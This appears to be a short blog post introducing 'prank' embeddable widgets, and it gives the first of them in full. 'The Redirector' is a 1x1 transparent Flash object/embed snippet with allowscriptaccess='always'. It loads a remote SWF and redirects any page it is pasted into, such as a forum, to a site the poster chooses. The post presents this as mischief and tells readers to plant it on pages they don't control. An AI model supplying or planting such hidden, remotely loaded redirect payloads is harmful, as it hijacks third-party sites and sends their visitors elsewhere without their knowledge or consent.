I’m going to be making a collection of embeddable widgets that you can use to play tricks on people. All you do is embed the widget on a page, the same way you would embed a YouTube video, and it’ll perform mischief on your behalf.
Here’s the first one…
The Redirector.
Copy and paste the code below into a page online, e.g. a forum, and it’ll redirect that page to whatever page you like, e.g. your blog. Just replace the two addresses in caps below with the page you want to redirect to.
<object width="1" height="1"><param name="movie" value="http://www.limmy.com/tricks/redirector.swf"></param><param name="FlashVars" value="url=HTTP://WWW.YOURSITEHERE.COM"><param name="wmode" value="transparent"></param><embed src="http://www.limmy.com/tricks/redirector.swf" FlashVars="url=HTTP://WWW.YOURSITEHERE.COM" type="application/x-shockwave-flash" allowscriptaccess="always" wmode="transparent" width="1" height="1"></embed></object>





